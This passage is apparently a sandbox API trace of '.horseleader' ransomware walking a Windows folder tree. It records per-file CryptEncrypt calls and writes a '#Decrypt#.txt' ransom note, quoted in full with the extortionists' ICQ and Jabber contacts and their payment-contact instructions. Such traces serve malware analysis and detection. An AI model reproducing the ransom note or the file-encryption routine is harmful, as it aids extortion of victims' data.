lpString2=".") returned 1 [0234.212] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.212] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui") returned 76 [0234.212] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.212] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.212] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.212] lstrlenW (lpString=".testttjffg") returned 11 [0234.212] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.212] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.213] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.213] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe721d8e0, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe7432bf6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe7458d53, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.213] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.213] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\#Decrypt#.txt") returned 74 [0234.213] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lv-lv\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.214] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.214] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.215] lstrlenA (lpString="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") returned 1368 [0234.215] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.215] CloseHandle (hObject=0x158) returned 1 [0234.216] GetProcessHeap () returned 0x780000 [0234.216] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.216] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69e22d6e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x69e22d6e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x3188e7b0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x1a0200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0234.216] lstrcmpiW (lpString1="micaut.dll", lpString2="Windows") returned -1 [0234.216] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll") returned 65 [0234.216] StrStrIW (lpFirst="micaut.dll", lpSrch=".horseleader") returned 0x0 [0234.216] lstrcmpW (lpString1="micaut.dll", lpString2="#Decrypt#.txt") returned 1 [0234.216] lstrcmpW (lpString1="micaut.dll", lpString2="_uninstalling_.png") returned 1 [0234.216] lstrlenW (lpString=".testttjffg") returned 11 [0234.216] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\micaut.dll", lpSrch=".testttjffg") returned 0x0 [0234.216] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.216] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.217] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x472c5956, ftCreationTime.dwHighDateTime=0x1ca040e, ftLastAccessTime.dwLowDateTime=0xa4945a00, ftLastAccessTime.dwHighDateTime=0x1ca0424, ftLastWriteTime.dwLowDateTime=0x9fcc4285, ftLastWriteTime.dwHighDateTime=0x1ca0425, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0234.217] lstrcmpiW (lpString1="Microsoft.Ink.dll", lpString2="Windows") returned -1 [0234.217] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll") returned 72 [0234.217] StrStrIW (lpFirst="Microsoft.Ink.dll", lpSrch=".horseleader") returned 0x0 [0234.218] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="#Decrypt#.txt") returned 1 [0234.218] lstrcmpW (lpString1="Microsoft.Ink.dll", lpString2="_uninstalling_.png") returned 1 [0234.218] lstrlenW (lpString=".testttjffg") returned 11 [0234.218] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll", 
lpSrch=".testttjffg") returned 0x0 [0234.218] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.218] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.218] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.218] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa12394d3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa12394d3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa125f634, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x179c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0234.218] lstrcmpiW (lpString1="mip.exe", lpString2="Windows") returned -1 [0234.218] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe") returned 62 [0234.218] StrStrIW (lpFirst="mip.exe", lpSrch=".horseleader") returned 0x0 [0234.218] lstrcmpW (lpString1="mip.exe", lpString2="#Decrypt#.txt") returned 1 [0234.218] lstrcmpW (lpString1="mip.exe", lpString2="_uninstalling_.png") returned 1 [0234.218] lstrlenW (lpString=".testttjffg") returned 11 [0234.219] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe", lpSrch=".testttjffg") returned 0x0 [0234.219] CryptGenRandom (in: hProv=0x7c6248, 
dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.219] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mip.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mip.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.219] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ad46e47, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5ad46e47, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x344e2230, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x609c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0234.219] lstrcmpiW (lpString1="mraut.dll", lpString2="Windows") returned -1 [0234.219] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll") returned 64 [0234.219] StrStrIW (lpFirst="mraut.dll", lpSrch=".horseleader") returned 0x0 [0234.219] lstrcmpW (lpString1="mraut.dll", lpString2="#Decrypt#.txt") returned 1 [0234.220] lstrcmpW (lpString1="mraut.dll", lpString2="_uninstalling_.png") returned 1 [0234.220] lstrlenW (lpString=".testttjffg") returned 11 [0234.220] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll", lpSrch=".testttjffg") returned 0x0 [0234.220] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.220] CryptEncrypt (in: 
hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.220] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.220] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66c00201, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x66c00201, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x34eb4c90, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mshwgst.dll", cAlternateFileName="")) returned 1 [0234.220] lstrcmpiW (lpString1="mshwgst.dll", lpString2="Windows") returned -1 [0234.220] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll") returned 66 [0234.220] StrStrIW (lpFirst="mshwgst.dll", lpSrch=".horseleader") returned 0x0 [0234.220] lstrcmpW (lpString1="mshwgst.dll", lpString2="#Decrypt#.txt") returned 1 [0234.220] lstrcmpW (lpString1="mshwgst.dll", lpString2="_uninstalling_.png") returned 1 [0234.220] lstrlenW (lpString=".testttjffg") returned 11 [0234.221] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll", lpSrch=".testttjffg") returned 0x0 [0234.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, 
pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwgst.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwgst.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.221] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901e133e, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x901e133e, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x353c2bb0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x105a00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="mshwLatin.dll", cAlternateFileName="")) returned 1 [0234.221] lstrcmpiW (lpString1="mshwLatin.dll", lpString2="Windows") returned -1 [0234.221] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll") returned 68 [0234.221] StrStrIW (lpFirst="mshwLatin.dll", lpSrch=".horseleader") returned 0x0 [0234.221] lstrcmpW (lpString1="mshwLatin.dll", lpString2="#Decrypt#.txt") returned 1 [0234.221] lstrcmpW (lpString1="mshwLatin.dll", lpString2="_uninstalling_.png") returned 1 [0234.221] lstrlenW (lpString=".testttjffg") returned 11 [0234.221] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll", lpSrch=".testttjffg") returned 0x0 [0234.221] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.221] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mshwLatin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mshwlatin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.222] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0234.222] lstrcmpiW (lpString1="nb-NO", lpString2="Windows") returned -1 [0234.222] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO") returned 60 [0234.222] lstrcmpW (lpString1="nb-NO", lpString2=".") returned 1 [0234.222] lstrcmpW (lpString1="nb-NO", lpString2="..") returned 1 [0234.222] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.222] GetProcessHeap () returned 0x780000 [0234.222] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.222] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*") returned 62 [0234.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\*", lpFindFileData=0x32aeba0 | out: 
lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.223] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.223] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\.") returned 62 [0234.223] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.223] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.223] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\..") returned 63 [0234.223] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.223] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, 
ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.224] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.224] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui") returned 76 [0234.224] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.224] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.224] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.224] lstrlenW (lpString=".testttjffg") returned 11 [0234.224] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.224] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.224] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.224] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xead074bc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeaef6675, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xeaef6675, 
ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.224] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.224] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\#Decrypt#.txt") returned 74 [0234.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\nb-NO\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\nb-no\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.225] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.225] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.226] lstrlenA (lpString="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") returned 1368 [0234.226] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.226] CloseHandle (hObject=0x158) returned 1 [0234.226] GetProcessHeap () returned 0x780000 [0234.226] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.226] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="nl-NL", 